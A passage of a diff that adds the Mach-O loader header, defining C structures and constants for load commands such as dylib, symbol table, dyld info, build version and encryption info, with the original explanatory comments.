Created with -seglinkedit */ + /* option to ld(1) for MH_EXECUTE and */ + /* FVMLIB file types only */ + +#define SEG_LINKINFO "__LINKINFO" /* the segment overlapping with linkedit */ + /* containing linking information */ + +#define SEG_UNIXSTACK "__UNIXSTACK" /* the unix stack segment */ + +#define SEG_IMPORT "__IMPORT" /* the segment for the self (dyld) */ + /* modifing code stubs that has read, */ + /* write and execute permissions */ + +/* + * Fixed virtual memory shared libraries are identified by two things. The + * target pathname (the name of the library as found for execution), and the + * minor version number. The address of where the headers are loaded is in + * header_addr. (THIS IS OBSOLETE and no longer supported). + */ +struct fvmlib { + union lc_str name; /* library's target pathname */ + uint32_t minor_version; /* library's minor version number */ + uint32_t header_addr; /* library's header address */ +}; + +/* + * A fixed virtual shared library (filetype == MH_FVMLIB in the mach header) + * contains a fvmlib_command (cmd == LC_IDFVMLIB) to identify the library. + * An object that uses a fixed virtual shared library also contains a + * fvmlib_command (cmd == LC_LOADFVMLIB) for each library it uses. + * (THIS IS OBSOLETE and no longer supported). + */ +struct fvmlib_command { + uint32_t cmd; /* LC_IDFVMLIB or LC_LOADFVMLIB */ + uint32_t cmdsize; /* includes pathname string */ + struct fvmlib fvmlib; /* the library identification */ +}; + +/* + * Dynamicly linked shared libraries are identified by two things. The + * pathname (the name of the library as found for execution), and the + * compatibility version number. The pathname must match and the compatibility + * number in the user of the library must be greater than or equal to the + * library being used. 
The time stamp is used to record the time a library was + * built and copied into user so it can be used to determine if the library used + * at runtime is exactly the same as used to build the program. + */ +struct dylib { + union lc_str name; /* library's path name */ + uint32_t timestamp; /* library's build time stamp */ + uint32_t current_version; /* library's current version number */ + uint32_t compatibility_version; /* library's compatibility vers number*/ +}; + +/* + * A dynamically linked shared library (filetype == MH_DYLIB in the mach header) + * contains a dylib_command (cmd == LC_ID_DYLIB) to identify the library. + * An object that uses a dynamically linked shared library also contains a + * dylib_command (cmd == LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, or + * LC_REEXPORT_DYLIB) for each library it uses. + */ +struct dylib_command { + uint32_t cmd; /* LC_ID_DYLIB, LC_LOAD_{,WEAK_}DYLIB, + LC_REEXPORT_DYLIB */ + uint32_t cmdsize; /* includes pathname string */ + struct dylib dylib; /* the library identification */ +}; + +/* + * A dynamically linked shared library may be a subframework of an umbrella + * framework. If so it will be linked with "-umbrella umbrella_name" where + * "umbrella_name" is the name of the umbrella framework. A subframework + * can only be linked against by its umbrella framework or other subframeworks + * that are part of the same umbrella framework. Otherwise the static link + * editor produces an error and states to link against the umbrella framework. + * The name of the umbrella framework for subframeworks is recorded in the + * following structure. 
+ */ +struct sub_framework_command { + uint32_t cmd; /* LC_SUB_FRAMEWORK */ + uint32_t cmdsize; /* includes umbrella string */ + union lc_str umbrella; /* the umbrella framework name */ +}; + +/* + * For dynamically linked shared libraries that are subframeworks of an umbrella + * framework they can allow clients other than the umbrella framework or other + * subframeworks in the same umbrella framework. To do this the subframework + * is built with "-allowable_client client_name" and an LC_SUB_CLIENT load + * command is created for each -allowable_client flag. The client_name is + * usually a framework name. It can also be a name used for bundle clients + * where the bundle is built with "-client_name client_name". + */ +struct sub_client_command { + uint32_t cmd; /* LC_SUB_CLIENT */ + uint32_t cmdsize; /* includes client string */ + union lc_str client; /* the client name */ +}; + +/* + * A dynamically linked shared library may be a sub_umbrella of an umbrella + * framework. If so it will be linked with "-sub_umbrella umbrella_name" where + * "umbrella_name" is the name of the sub_umbrella framework. When + * statically linking when -twolevel_namespace is in effect a twolevel namespace + * umbrella framework will only cause its subframeworks and those frameworks + * listed as sub_umbrella frameworks to be implicitly linked in. Any other + * dependent dynamic libraries will not be linked in when -twolevel_namespace + * is in effect. The primary library recorded by the static linker when + * resolving a symbol in these libraries will be the umbrella framework. + * Zero or more sub_umbrella frameworks may be used by an umbrella framework. + * The name of a sub_umbrella framework is recorded in the following structure. 
+ */ +struct sub_umbrella_command { + uint32_t cmd; /* LC_SUB_UMBRELLA */ + uint32_t cmdsize; /* includes sub_umbrella string */ + union lc_str sub_umbrella; /* the sub_umbrella framework name */ +}; + +/* + * A dynamically linked shared library may be a sub_library of another shared + * library. If so it will be linked with "-sub_library library_name" where + * "library_name" is the name of the sub_library shared library. When + * statically linking when -twolevel_namespace is in effect a twolevel namespace + * shared library will only cause its subframeworks and those frameworks + * listed as sub_umbrella frameworks and libraries listed as sub_libraries to + * be implicitly linked in. Any other dependent dynamic libraries will not be + * linked in when -twolevel_namespace is in effect. The primary library + * recorded by the static linker when resolving a symbol in these libraries + * will be the umbrella framework (or dynamic library). Zero or more sub_library + * shared libraries may be used by an umbrella framework (or dynamic library). + * The name of a sub_library framework is recorded in the following structure. + * For example /usr/lib/libobjc_profile.A.dylib would be recorded as "libobjc". + */ +struct sub_library_command { + uint32_t cmd; /* LC_SUB_LIBRARY */ + uint32_t cmdsize; /* includes sub_library string */ + union lc_str sub_library; /* the sub_library name */ +}; + +/* + * A program (filetype == MH_EXECUTE) that is + * prebound to its dynamic libraries has one of these for each library that + * the static linker used in prebinding. It contains a bit vector for the + * modules in the library. The bits indicate which modules are bound (1) and + * which are not (0) from the library. The bit for module 0 is the low bit + * of the first byte. 
So the bit for the Nth module is: + * (linked_modules[N/8] >> N%8) & 1 + */ +struct prebound_dylib_command { + uint32_t cmd; /* LC_PREBOUND_DYLIB */ + uint32_t cmdsize; /* includes strings */ + union lc_str name; /* library's path name */ + uint32_t nmodules; /* number of modules in library */ + union lc_str linked_modules; /* bit vector of linked modules */ +}; + +/* + * A program that uses a dynamic linker contains a dylinker_command to identify + * the name of the dynamic linker (LC_LOAD_DYLINKER). And a dynamic linker + * contains a dylinker_command to identify the dynamic linker (LC_ID_DYLINKER). + * A file can have at most one of these. + * This struct is also used for the LC_DYLD_ENVIRONMENT load command and + * contains string for dyld to treat like environment variable. + */ +struct dylinker_command { + uint32_t cmd; /* LC_ID_DYLINKER, LC_LOAD_DYLINKER or + LC_DYLD_ENVIRONMENT */ + uint32_t cmdsize; /* includes pathname string */ + union lc_str name; /* dynamic linker's path name */ +}; + +/* + * Thread commands contain machine-specific data structures suitable for + * use in the thread state primitives. The machine specific data structures + * follow the struct thread_command as follows. + * Each flavor of machine specific data structure is preceded by an uint32_t + * constant for the flavor of that data structure, an uint32_t that is the + * count of uint32_t's of the size of the state data structure and then + * the state data structure follows. This triple may be repeated for many + * flavors. The constants for the flavors, counts and state data structure + * definitions are expected to be in the header file . + * These machine specific data structures sizes must be multiples of + * 4 bytes. The cmdsize reflects the total size of the thread_command + * and all of the sizes of the constants for the flavors, counts and state + * data structures. 
+ * + * For executable objects that are unix processes there will be one + * thread_command (cmd == LC_UNIXTHREAD) created for it by the link-editor. + * This is the same as a LC_THREAD, except that a stack is automatically + * created (based on the shell's limit for the stack size). Command arguments + * and environment variables are copied onto that stack. + */ +struct thread_command { + uint32_t cmd; /* LC_THREAD or LC_UNIXTHREAD */ + uint32_t cmdsize; /* total size of this command */ + /* uint32_t flavor flavor of thread state */ + /* uint32_t count count of uint32_t's in thread state */ + /* struct XXX_thread_state state thread state for this flavor */ + /* ... */ +}; + +/* + * The routines command contains the address of the dynamic shared library + * initialization routine and an index into the module table for the module + * that defines the routine. Before any modules are used from the library the + * dynamic linker fully binds the module that defines the initialization routine + * and then calls it. This gets called before any module initialization + * routines (used for C++ static constructors) in the library. + */ +struct routines_command { /* for 32-bit architectures */ + uint32_t cmd; /* LC_ROUTINES */ + uint32_t cmdsize; /* total size of this command */ + uint32_t init_address; /* address of initialization routine */ + uint32_t init_module; /* index into the module table that */ + /* the init routine is defined in */ + uint32_t reserved1; + uint32_t reserved2; + uint32_t reserved3; + uint32_t reserved4; + uint32_t reserved5; + uint32_t reserved6; +}; + +/* + * The 64-bit routines command. Same use as above. 
+ */ +struct routines_command_64 { /* for 64-bit architectures */ + uint32_t cmd; /* LC_ROUTINES_64 */ + uint32_t cmdsize; /* total size of this command */ + uint64_t init_address; /* address of initialization routine */ + uint64_t init_module; /* index into the module table that */ + /* the init routine is defined in */ + uint64_t reserved1; + uint64_t reserved2; + uint64_t reserved3; + uint64_t reserved4; + uint64_t reserved5; + uint64_t reserved6; +}; + +/* + * The symtab_command contains the offsets and sizes of the link-edit 4.3BSD + * "stab" style symbol table information as described in the header files + * and . + */ +struct symtab_command { + uint32_t cmd; /* LC_SYMTAB */ + uint32_t cmdsize; /* sizeof(struct symtab_command) */ + uint32_t symoff; /* symbol table offset */ + uint32_t nsyms; /* number of symbol table entries */ + uint32_t stroff; /* string table offset */ + uint32_t strsize; /* string table size in bytes */ +}; + +/* + * This is the second set of the symbolic information which is used to support + * the data structures for the dynamically link editor. + * + * The original set of symbolic information in the symtab_command which contains + * the symbol and string tables must also be present when this load command is + * present. When this load command is present the symbol table is organized + * into three groups of symbols: + * local symbols (static and debugging symbols) - grouped by module + * defined external symbols - grouped by module (sorted by name if not lib) + * undefined external symbols (sorted by name if MH_BINDATLOAD is not set, + * and in order the were seen by the static + * linker if MH_BINDATLOAD is set) + * In this load command there are offsets and counts to each of the three groups + * of symbols. 
+ * + * This load command contains a the offsets and sizes of the following new + * symbolic information tables: + * table of contents + * module table + * reference symbol table + * indirect symbol table + * The first three tables above (the table of contents, module table and + * reference symbol table) are only present if the file is a dynamically linked + * shared library. For executable and object modules, which are files + * containing only one module, the information that would be in these three + * tables is determined as follows: + * table of contents - the defined external symbols are sorted by name + * module table - the file contains only one module so everything in the + * file is part of the module. + * reference symbol table - is the defined and undefined external symbols + * + * For dynamically linked shared library files this load command also contains + * offsets and sizes to the pool of relocation entries for all sections + * separated into two groups: + * external relocation entries + * local relocation entries + * For executable and object modules the relocation entries continue to hang + * off the section structures. + */ +struct dysymtab_command { + uint32_t cmd; /* LC_DYSYMTAB */ + uint32_t cmdsize; /* sizeof(struct dysymtab_command) */ + + /* + * The symbols indicated by symoff and nsyms of the LC_SYMTAB load command + * are grouped into the following three groups: + * local symbols (further grouped by the module they are from) + * defined external symbols (further grouped by the module they are from) + * undefined symbols + * + * The local symbols are used only for debugging. The dynamic binding + * process may have to use them to indicate to the debugger the local + * symbols for a module that is being bound. + * + * The last two groups are used by the dynamic binding process to do the + * binding (indirectly through the module table and the reference symbol + * table when this is a dynamically linked shared library file). 
+ */ + uint32_t ilocalsym; /* index to local symbols */ + uint32_t nlocalsym; /* number of local symbols */ + + uint32_t iextdefsym;/* index to externally defined symbols */ + uint32_t nextdefsym;/* number of externally defined symbols */ + + uint32_t iundefsym; /* index to undefined symbols */ + uint32_t nundefsym; /* number of undefined symbols */ + + /* + * For the for the dynamic binding process to find which module a symbol + * is defined in the table of contents is used (analogous to the ranlib + * structure in an archive) which maps defined external symbols to modules + * they are defined in. This exists only in a dynamically linked shared + * library file. For executable and object modules the defined external + * symbols are sorted by name and is use as the table of contents. + */ + uint32_t tocoff; /* file offset to table of contents */ + uint32_t ntoc; /* number of entries in table of contents */ + + /* + * To support dynamic binding of "modules" (whole object files) the symbol + * table must reflect the modules that the file was created from. This is + * done by having a module table that has indexes and counts into the merged + * tables for each module. The module structure that these two entries + * refer to is described below. This exists only in a dynamically linked + * shared library file. For executable and object modules the file only + * contains one module so everything in the file belongs to the module. + */ + uint32_t modtaboff; /* file offset to module table */ + uint32_t nmodtab; /* number of module table entries */ + + /* + * To support dynamic module binding the module structure for each module + * indicates the external references (defined and undefined) each module + * makes. For each module there is an offset and a count into the + * reference symbol table for the symbols that the module references. + * This exists only in a dynamically linked shared library file. 
For + * executable and object modules the defined external symbols and the + * undefined external symbols indicates the external references. + */ + uint32_t extrefsymoff; /* offset to referenced symbol table */ + uint32_t nextrefsyms; /* number of referenced symbol table entries */ + + /* + * The sections that contain "symbol pointers" and "routine stubs" have + * indexes and (implied counts based on the size of the section and fixed + * size of the entry) into the "indirect symbol" table for each pointer + * and stub. For every section of these two types the index into the + * indirect symbol table is stored in the section header in the field + * reserved1. An indirect symbol table entry is simply a 32bit index into + * the symbol table to the symbol that the pointer or stub is referring to. + * The indirect symbol table is ordered to match the entries in the section. + */ + uint32_t indirectsymoff; /* file offset to the indirect symbol table */ + uint32_t nindirectsyms; /* number of indirect symbol table entries */ + + /* + * To support relocating an individual module in a library file quickly the + * external relocation entries for each module in the library need to be + * accessed efficiently. Since the relocation entries can't be accessed + * through the section headers for a library file they are separated into + * groups of local and external entries further grouped by module. In this + * case the presents of this load command who's extreloff, nextrel, + * locreloff and nlocrel fields are non-zero indicates that the relocation + * entries of non-merged sections are not referenced through the section + * structures (and the reloff and nreloc fields in the section headers are + * set to zero). + * + * Since the relocation entries are not accessed through the section headers + * this requires the r_address field to be something other than a section + * offset to identify the item to be relocated. 
In this case r_address is + * set to the offset from the vmaddr of the first LC_SEGMENT command. + * For MH_SPLIT_SEGS images r_address is set to the the offset from the + * vmaddr of the first read-write LC_SEGMENT command. + * + * The relocation entries are grouped by module and the module table + * entries have indexes and counts into them for the group of external + * relocation entries for that the module. + * + * For sections that are merged across modules there must not be any + * remaining external relocation entries for them (for merged sections + * remaining relocation entries must be local). + */ + uint32_t extreloff; /* offset to external relocation entries */ + uint32_t nextrel; /* number of external relocation entries */ + + /* + * All the local relocation entries are grouped together (they are not + * grouped by their module since they are only used if the object is moved + * from it staticly link edited address). + */ + uint32_t locreloff; /* offset to local relocation entries */ + uint32_t nlocrel; /* number of local relocation entries */ + +}; + +/* + * An indirect symbol table entry is simply a 32bit index into the symbol table + * to the symbol that the pointer or stub is refering to. Unless it is for a + * non-lazy symbol pointer section for a defined symbol which strip(1) as + * removed. In which case it has the value INDIRECT_SYMBOL_LOCAL. If the + * symbol was also absolute INDIRECT_SYMBOL_ABS is or'ed with that. 
+ */ +#define INDIRECT_SYMBOL_LOCAL 0x80000000 +#define INDIRECT_SYMBOL_ABS 0x40000000 + + +/* a table of contents entry */ +struct dylib_table_of_contents { + uint32_t symbol_index; /* the defined external symbol + (index into the symbol table) */ + uint32_t module_index; /* index into the module table this symbol + is defined in */ +}; + +/* a module table entry */ +struct dylib_module { + uint32_t module_name; /* the module name (index into string table) */ + + uint32_t iextdefsym; /* index into externally defined symbols */ + uint32_t nextdefsym; /* number of externally defined symbols */ + uint32_t irefsym; /* index into reference symbol table */ + uint32_t nrefsym; /* number of reference symbol table entries */ + uint32_t ilocalsym; /* index into symbols for local symbols */ + uint32_t nlocalsym; /* number of local symbols */ + + uint32_t iextrel; /* index into external relocation entries */ + uint32_t nextrel; /* number of external relocation entries */ + + uint32_t iinit_iterm; /* low 16 bits are the index into the init + section, high 16 bits are the index into + the term section */ + uint32_t ninit_nterm; /* low 16 bits are the number of init section + entries, high 16 bits are the number of + term section entries */ + + uint32_t /* for this module address of the start of */ + objc_module_info_addr; /* the (__OBJC,__module_info) section */ + uint32_t /* for this module size of */ + objc_module_info_size; /* the (__OBJC,__module_info) section */ +}; + +/* a 64-bit module table entry */ +struct dylib_module_64 { + uint32_t module_name; /* the module name (index into string table) */ + + uint32_t iextdefsym; /* index into externally defined symbols */ + uint32_t nextdefsym; /* number of externally defined symbols */ + uint32_t irefsym; /* index into reference symbol table */ + uint32_t nrefsym; /* number of reference symbol table entries */ + uint32_t ilocalsym; /* index into symbols for local symbols */ + uint32_t nlocalsym; /* number of local symbols */ + 
+ uint32_t iextrel; /* index into external relocation entries */ + uint32_t nextrel; /* number of external relocation entries */ + + uint32_t iinit_iterm; /* low 16 bits are the index into the init + section, high 16 bits are the index into + the term section */ + uint32_t ninit_nterm; /* low 16 bits are the number of init section + entries, high 16 bits are the number of + term section entries */ + + uint32_t /* for this module size of */ + objc_module_info_size; /* the (__OBJC,__module_info) section */ + uint64_t /* for this module address of the start of */ + objc_module_info_addr; /* the (__OBJC,__module_info) section */ +}; + +/* + * The entries in the reference symbol table are used when loading the module + * (both by the static and dynamic link editors) and if the module is unloaded + * or replaced. Therefore all external symbols (defined and undefined) are + * listed in the module's reference table. The flags describe the type of + * reference that is being made. The constants for the flags are defined in + * as they are also used for symbol table entries. + */ +struct dylib_reference { + uint32_t isym:24, /* index into the symbol table */ + flags:8; /* flags to indicate the type of reference */ +}; + +/* + * The twolevel_hints_command contains the offset and number of hints in the + * two-level namespace lookup hints table. + */ +struct twolevel_hints_command { + uint32_t cmd; /* LC_TWOLEVEL_HINTS */ + uint32_t cmdsize; /* sizeof(struct twolevel_hints_command) */ + uint32_t offset; /* offset to the hint table */ + uint32_t nhints; /* number of hints in the hint table */ +}; + +/* + * The entries in the two-level namespace lookup hints table are twolevel_hint + * structs. These provide hints to the dynamic link editor where to start + * looking for an undefined symbol in a two-level namespace image. 
The + * isub_image field is an index into the sub-images (sub-frameworks and + * sub-umbrellas list) that made up the two-level image that the undefined + * symbol was found in when it was built by the static link editor. If + * isub-image is 0 the the symbol is expected to be defined in library and not + * in the sub-images. If isub-image is non-zero it is an index into the array + * of sub-images for the umbrella with the first index in the sub-images being + * 1. The array of sub-images is the ordered list of sub-images of the umbrella + * that would be searched for a symbol that has the umbrella recorded as its + * primary library. The table of contents index is an index into the + * library's table of contents. This is used as the starting point of the + * binary search or a directed linear search. + */ +struct twolevel_hint { + uint32_t + isub_image:8, /* index into the sub images */ + itoc:24; /* index into the table of contents */ +}; + +/* + * The prebind_cksum_command contains the value of the original check sum for + * prebound files or zero. When a prebound file is first created or modified + * for other than updating its prebinding information the value of the check sum + * is set to zero. When the file has it prebinding re-done and if the value of + * the check sum is zero the original check sum is calculated and stored in + * cksum field of this load command in the output file. If when the prebinding + * is re-done and the cksum field is non-zero it is left unchanged from the + * input file. + */ +struct prebind_cksum_command { + uint32_t cmd; /* LC_PREBIND_CKSUM */ + uint32_t cmdsize; /* sizeof(struct prebind_cksum_command) */ + uint32_t cksum; /* the check sum or zero */ +}; + +/* + * The uuid load command contains a single 128-bit unique random number that + * identifies an object produced by the static link editor. 
+ */ +struct uuid_command { + uint32_t cmd; /* LC_UUID */ + uint32_t cmdsize; /* sizeof(struct uuid_command) */ + uint8_t uuid[16]; /* the 128-bit uuid */ +}; + +/* + * The rpath_command contains a path which at runtime should be added to + * the current run path used to find @rpath prefixed dylibs. + */ +struct rpath_command { + uint32_t cmd; /* LC_RPATH */ + uint32_t cmdsize; /* includes string */ + union lc_str path; /* path to add to run path */ +}; + +/* + * The linkedit_data_command contains the offsets and sizes of a blob + * of data in the __LINKEDIT segment. + */ +struct linkedit_data_command { + uint32_t cmd; /* LC_CODE_SIGNATURE, LC_SEGMENT_SPLIT_INFO, + LC_FUNCTION_STARTS, LC_DATA_IN_CODE, + LC_DYLIB_CODE_SIGN_DRS, + LC_LINKER_OPTIMIZATION_HINT, + LC_DYLD_EXPORTS_TRIE, or + LC_DYLD_CHAINED_FIXUPS. */ + uint32_t cmdsize; /* sizeof(struct linkedit_data_command) */ + uint32_t dataoff; /* file offset of data in __LINKEDIT segment */ + uint32_t datasize; /* file size of data in __LINKEDIT segment */ +}; + +struct fileset_entry_command { + uint32_t cmd; /* LC_FILESET_ENTRY */ + uint32_t cmdsize; /* includes id string */ + uint64_t vmaddr; /* memory address of the dylib */ + uint64_t fileoff; /* file offset of the dylib */ + union lc_str entry_id; /* contained entry id */ + uint32_t reserved; /* entry_id is 32-bits long, so this is the reserved padding */ +}; + +/* + * The encryption_info_command contains the file offset and size of an + * of an encrypted segment. + */ +struct encryption_info_command { + uint32_t cmd; /* LC_ENCRYPTION_INFO */ + uint32_t cmdsize; /* sizeof(struct encryption_info_command) */ + uint32_t cryptoff; /* file offset of encrypted range */ + uint32_t cryptsize; /* file size of encrypted range */ + uint32_t cryptid; /* which enryption system, + 0 means not-encrypted yet */ +}; + +/* + * The encryption_info_command_64 contains the file offset and size of an + * of an encrypted segment (for use in x86_64 targets). 
+ */ +struct encryption_info_command_64 { + uint32_t cmd; /* LC_ENCRYPTION_INFO_64 */ + uint32_t cmdsize; /* sizeof(struct encryption_info_command_64) */ + uint32_t cryptoff; /* file offset of encrypted range */ + uint32_t cryptsize; /* file size of encrypted range */ + uint32_t cryptid; /* which enryption system, + 0 means not-encrypted yet */ + uint32_t pad; /* padding to make this struct's size a multiple + of 8 bytes */ +}; + +/* + * The version_min_command contains the min OS version on which this + * binary was built to run. + */ +struct version_min_command { + uint32_t cmd; /* LC_VERSION_MIN_MACOSX or + LC_VERSION_MIN_IPHONEOS or + LC_VERSION_MIN_WATCHOS or + LC_VERSION_MIN_TVOS */ + uint32_t cmdsize; /* sizeof(struct min_version_command) */ + uint32_t version; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ + uint32_t sdk; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ +}; + +/* + * The build_version_command contains the min OS version on which this + * binary was built to run for its platform. The list of known platforms and + * tool values following it. + */ +struct build_version_command { + uint32_t cmd; /* LC_BUILD_VERSION */ + uint32_t cmdsize; /* sizeof(struct build_version_command) plus */ + /* ntools * sizeof(struct build_tool_version) */ + uint32_t platform; /* platform */ + uint32_t minos; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ + uint32_t sdk; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ + uint32_t ntools; /* number of tool entries following this */ +}; + +struct build_tool_version { + uint32_t tool; /* enum for the tool */ + uint32_t version; /* version number of the tool */ +}; + +/* Known values for the platform field above. 
*/ +#define PLATFORM_MACOS 1 +#define PLATFORM_IOS 2 +#define PLATFORM_TVOS 3 +#define PLATFORM_WATCHOS 4 +#define PLATFORM_BRIDGEOS 5 +#define PLATFORM_MACCATALYST 6 +#define PLATFORM_IOSSIMULATOR 7 +#define PLATFORM_TVOSSIMULATOR 8 +#define PLATFORM_WATCHOSSIMULATOR 9 +#define PLATFORM_DRIVERKIT 10 +#define PLATFORM_MAX PLATFORM_DRIVERKIT +/* Addition of simulated platfrom also needs to update proc_is_simulated() */ + +/* Known values for the tool field above. */ +#define TOOL_CLANG 1 +#define TOOL_SWIFT 2 +#define TOOL_LD 3 + +/* + * The dyld_info_command contains the file offsets and sizes of + * the new compressed form of the information dyld needs to + * load the image. This information is used by dyld on Mac OS X + * 10.6 and later. All information pointed to by this command + * is encoded using byte streams, so no endian swapping is needed + * to interpret it. + */ +struct dyld_info_command { + uint32_t cmd; /* LC_DYLD_INFO or LC_DYLD_INFO_ONLY */ + uint32_t cmdsize; /* sizeof(struct dyld_info_command) */ + + /* + * Dyld rebases an image whenever dyld loads it at an address different + * from its preferred address. The rebase information is a stream + * of byte sized opcodes whose symbolic names start with REBASE_OPCODE_. + * Conceptually the rebase information is a table of tuples: + * + * The opcodes are a compressed way to encode the table by only + * encoding when a column changes. In addition simple patterns + * like "every n'th offset for m times" can be encoded in a few + * bytes. + */ + uint32_t rebase_off; /* file offset to rebase info */ + uint32_t rebase_size; /* size of rebase info */ + + /* + * Dyld binds an image during the loading process, if the image + * requires any pointers to be initialized to symbols in other images. + * The bind information is a stream of byte sized + * opcodes whose symbolic names start with BIND_OPCODE_. 
+ * Conceptually the bind information is a table of tuples: + * + * The opcodes are a compressed way to encode the table by only + * encoding when a column changes. In addition simple patterns + * like for runs of pointers initialzed to the same value can be + * encoded in a few bytes. + */ + uint32_t bind_off; /* file offset to binding info */ + uint32_t bind_size; /* size of binding info */ + + /* + * Some C++ programs require dyld to unique symbols so that all + * images in the process use the same copy of some code/data. + * This step is done after binding. The content of the weak_bind + * info is an opcode stream like the bind_info. But it is sorted + * alphabetically by symbol name. This enable dyld to walk + * all images with weak binding information in order and look + * for collisions. If there are no collisions, dyld does + * no updating. That means that some fixups are also encoded + * in the bind_info. For instance, all calls to "operator new" + * are first bound to libstdc++.dylib using the information + * in bind_info. Then if some image overrides operator new + * that is detected when the weak_bind information is processed + * and the call to operator new is then rebound. + */ + uint32_t weak_bind_off; /* file offset to weak binding info */ + uint32_t weak_bind_size; /* size of weak binding info */ + + /* + * Some uses of external symbols do not need to be bound immediately. + * Instead they can be lazily bound on first use. The lazy_bind + * are contains a stream of BIND opcodes to bind all lazy symbols. + * Normal use is that dyld ignores the lazy_bind section when + * loading an image. Instead the static linker arranged for the + * lazy pointer to initially point to a helper function which + * pushes the offset into the lazy_bind area for the symbol + * needing to be bound, then jumps to dyld which simply adds + * the offset to lazy_bind_off to get the information on what + * to bind. 
+ */ + uint32_t lazy_bind_off; /* file offset to lazy binding info */ + uint32_t lazy_bind_size; /* size of lazy binding infs */ + + /* + * The symbols exported by a dylib are encoded in a trie. This + * is a compact representation that factors out common prefixes. + * It also reduces LINKEDIT pages in RAM because it encodes all + * information (name, address, flags) in one small, contiguous range. + * The export area is a stream of nodes. The first node sequentially + * is the start node for the trie. + * + * Nodes for a symbol start with a uleb128 that is the length of + * the exported symbol information for the string so far. + * If there is no exported symbol, the node starts with a zero byte. + * If there is exported info, it follows the length. + * + * First is a uleb128 containing flags. Normally, it is followed by + * a uleb128 encoded offset which is location of the content named + * by the symbol from the mach_header for the image. If the flags + * is EXPORT_SYMBOL_FLAGS_REEXPORT, then following the flags is + * a uleb128 encoded library ordinal, then a zero terminated + * UTF8 string. If the string is zero length, then the symbol + * is re-export from the specified dylib with the same name. + * If the flags is EXPORT_SYMBOL_FLAGS_STUB_AND_RESOLVER, then following + * the flags is two uleb128s: the stub offset and the resolver offset. + * The stub is used by non-lazy pointers. The resolver is used + * by lazy pointers and must be called to get the actual address to use. + * + * After the optional exported symbol information is a byte of + * how many edges (0-255) that this node has leaving it, + * followed by each edge. + * Each edge is a zero terminated UTF8 of the addition chars + * in the symbol, followed by a uleb128 offset for the node that + * edge points to. 
+ * + */ + uint32_t export_off; /* file offset to lazy binding info */ + uint32_t export_size; /* size of lazy binding infs */ +}; + +/* + * The following are used to encode rebasing information + */ +#define REBASE_TYPE_POINTER 1 +#define REBASE_TYPE_TEXT_ABSOLUTE32 2 +#define REBASE_TYPE_TEXT_PCREL32 3 + +#define REBASE_OPCODE_MASK 0xF0 +#define REBASE_IMMEDIATE_MASK 0x0F +#define REBASE_OPCODE_DONE 0x00 +#define REBASE_OPCODE_SET_TYPE_IMM 0x10 +#define REBASE_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB 0x20 +#define REBASE_OPCODE_ADD_ADDR_ULEB 0x30 +#define REBASE_OPCODE_ADD_ADDR_IMM_SCALED 0x40 +#define REBASE_OPCODE_DO_REBASE_IMM_TIMES 0x50 +#define REBASE_OPCODE_DO_REBASE_ULEB_TIMES 0x60 +#define REBASE_OPCODE_DO_REBASE_ADD_ADDR_ULEB 0x70 +#define REBASE_OPCODE_DO_REBASE_ULEB_TIMES_SKIPPING_ULEB 0x80 + + +/* + * The following are used to encode binding information + */ +#define BIND_TYPE_POINTER 1 +#define BIND_TYPE_TEXT_ABSOLUTE32 2 +#define BIND_TYPE_TEXT_PCREL32 3 + +#define BIND_SPECIAL_DYLIB_SELF 0 +#define BIND_SPECIAL_DYLIB_MAIN_EXECUTABLE -1 +#define BIND_SPECIAL_DYLIB_FLAT_LOOKUP -2 +#define BIND_SPECIAL_DYLIB_WEAK_LOOKUP -3 + +#define BIND_SYMBOL_FLAGS_WEAK_IMPORT 0x1 +#define BIND_SYMBOL_FLAGS_NON_WEAK_DEFINITION 0x8 + +#define BIND_OPCODE_MASK 0xF0 +#define BIND_IMMEDIATE_MASK 0x0F +#define BIND_OPCODE_DONE 0x00 +#define BIND_OPCODE_SET_DYLIB_ORDINAL_IMM 0x10 +#define BIND_OPCODE_SET_DYLIB_ORDINAL_ULEB 0x20 +#define BIND_OPCODE_SET_DYLIB_SPECIAL_IMM 0x30 +#define BIND_OPCODE_SET_SYMBOL_TRAILING_FLAGS_IMM 0x40 +#define BIND_OPCODE_SET_TYPE_IMM 0x50 +#define BIND_OPCODE_SET_ADDEND_SLEB 0x60 +#define BIND_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB 0x70 +#define BIND_OPCODE_ADD_ADDR_ULEB 0x80 +#define BIND_OPCODE_DO_BIND 0x90 +#define BIND_OPCODE_DO_BIND_ADD_ADDR_ULEB 0xA0 +#define BIND_OPCODE_DO_BIND_ADD_ADDR_IMM_SCALED 0xB0 +#define BIND_OPCODE_DO_BIND_ULEB_TIMES_SKIPPING_ULEB 0xC0 +#define BIND_OPCODE_THREADED 0xD0 +#define 
BIND_SUBOPCODE_THREADED_SET_BIND_ORDINAL_TABLE_SIZE_ULEB 0x00 +#define BIND_SUBOPCODE_THREADED_APPLY 0x01 + + +/* + * The following are used on the flags byte of a terminal node + * in the export information. + */ +#define EXPORT_SYMBOL_FLAGS_KIND_MASK 0x03 +#define EXPORT_SYMBOL_FLAGS_KIND_REGULAR 0x00 +#define EXPORT_SYMBOL_FLAGS_KIND_THREAD_LOCAL 0x01 +#define EXPORT_SYMBOL_FLAGS_KIND_ABSOLUTE 0x02 +#define EXPORT_SYMBOL_FLAGS_WEAK_DEFINITION 0x04 +#define EXPORT_SYMBOL_FLAGS_REEXPORT 0x08 +#define EXPORT_SYMBOL_FLAGS_STUB_AND_RESOLVER 0x10 + +/* + * The linker_option_command contains linker options embedded in object files. + */ +struct linker_option_command { + uint32_t cmd; /* LC_LINKER_OPTION only used in MH_OBJECT filetypes */ + uint32_t cmdsize; + uint32_t count; /* number of strings */ + /* concatenation of zero terminated UTF8 strings. + Zero filled at end to align */ +}; + +/* + * The symseg_command contains the offset and size of the GNU style + * symbol table information as described in the header file . + * The symbol roots of the symbol segments must also be aligned properly + * in the file. So the requirement of keeping the offsets aligned to a + * multiple of a 4 bytes translates to the length field of the symbol + * roots also being a multiple of a long. Also the padding must again be + * zeroed. (THIS IS OBSOLETE and no longer supported). + */ +struct symseg_command { + uint32_t cmd; /* LC_SYMSEG */ + uint32_t cmdsize; /* sizeof(struct symseg_command) */ + uint32_t offset; /* symbol segment offset */ + uint32_t size; /* symbol segment size in bytes */ +}; + +/* + * The ident_command contains a free format string table following the + * ident_command structure. The strings are null terminated and the size of + * 